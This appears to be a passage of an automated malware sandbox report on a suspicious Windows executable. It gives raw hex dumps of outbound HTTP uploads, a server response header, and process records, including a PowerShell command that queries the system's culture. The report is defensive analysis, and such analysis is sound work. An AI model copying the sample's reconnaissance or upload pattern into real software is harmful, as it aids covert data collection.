                            2024-07-29 05:38:56 UTC16384OUTData Raw: 06 c4 c1 fe 1e 6a 17 d9 d8 b9 11 10 0f 74 f6 ec 59 e6 f3 39 ad 35 9e bc ac bc c2 f5 5b 3c d0 1f dc b1 cf 1b fc f1 16 ff ed d2 3c b7 6b 7f e5 8f f9 cf 70 db 77 bf 06 ff 1e 9f f5 19 9f ca 17 3f f6 73 f8 d7 b0 cd 7f 87 ef f4 8f f1 9e ef f9 9e b4 d6 b8 df ec 33 9f ca fa 73 1f 0e 36 cf 41 c6 16 00 c2 d8 80 84 6d 24 ae 30 97 99 e7 b4 f8 ec a7 b1 fc ac 87 60 ae e8 6a e5 6b bf ee eb f8 f8 13 1f 04 80 c5 f3 27 9e a9 f0 a2 88 08 24 21 89 07 2a 01 b6 71 4b 6c 93 99 d8 c6 36 d8 90 c9 b3 48 3c 8f 34 cf 29 c1 e6 7e 25 82 2b 12 db 00 48 e2 7e b6 78 61 6c f3 9f 49 e6 85 b2 cd bf 87 6d 5e 98 40 00 d8 e6 81 6c 03 20 89 17 c6 16 ff 1e 61 fe d5 6c f3 1f 4d 12 b6 b1 cd 03 c9 fc bb d8 e6 85 09 5e 38 db fc 5b c8 3c 07 db fc 47 b0 cd 03 c9 fc a7 b2 0d 40 98 67 b1 cd 7f 14 f1 c2
                            Data Ascii: jtY95[<<kpw?s3s6Am$0`jk'$!*qKl6H<4)~%+H~xalIm^@l alM^8[<G@g
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 4a 20 f9 97 c8 bc 00 c1 03 d9 e6 bf 92 1c 3c 37 db fc 5b d8 e6 39 d8 20 f1 c2 84 79 a1 6c f3 ef 61 9b 17 46 e6 df c5 36 ff 26 36 00 e2 df 29 cd 7f 17 db c8 fc bb 58 3c 07 99 e7 20 89 07 0a f3 1c 6c 63 9b 17 95 6d fe 2d c4 bf 8d 6d 5e 98 70 f0 a2 b2 cd 73 93 b9 cc 36 ff 11 6c f3 af 21 f3 3c 6c f3 dc 82 e7 cf 36 2f 0a 99 17 89 6d 5e 14 b6 01 08 f3 af 62 9b 7f 0d 49 3c 37 db 3c 4b 9a 17 85 78 36 db bc 30 92 b8 9f 6d 1e c8 36 0f a4 34 cf 8f cc 65 92 b0 8d 6d 00 24 01 10 5c 61 89 cc 04 40 12 b6 b1 0d 80 24 6c 03 10 bc 60 b6 b9 9f 24 ee 67 1b db 44 04 00 99 89 6d 22 02 80 cc 24 92 e7 20 89 07 8a 08 32 13 00 49 00 64 26 b6 89 08 32 13 49 dc 2f cc 65 b6 b1 8d 24 00 6c 03 10 12 f7 b3 4d 29 85 fb d9 06 c0 36 0f 64 1b 00 db 48 42 12 92 00 f0 d4 b0 8d 6d 24 11 11 00
                            Data Ascii: J <7[9 ylaF6&6)X< lcm-m^ps6l!<l6/m^bI<7<Kx60m64em$\a@$l`$gDm"$ 2Id&2I/e$lM)6dHBm$
                            2024-07-29 05:38:58 UTC389INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Mon, 29 Jul 2024 05:38:58 GMT
                            Content-Type: application/json
                            Content-Length: 1261
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:01:37:59
                            Start date:29/07/2024
                            Path:C:\Users\user\Desktop\765iYbgWn9.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\765iYbgWn9.exe"
                            Imagebase:0x7ff62f040000
                            File size:5'438'976 bytes
                            MD5 hash:0534AB10184891CD61D262BFD79B7B4C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:5
                            Start time:01:38:36
                            Start date:29/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                            Imagebase:0x7ff6cb6b0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:01:38:36
                            Start date:29/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ee680000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            No disassembly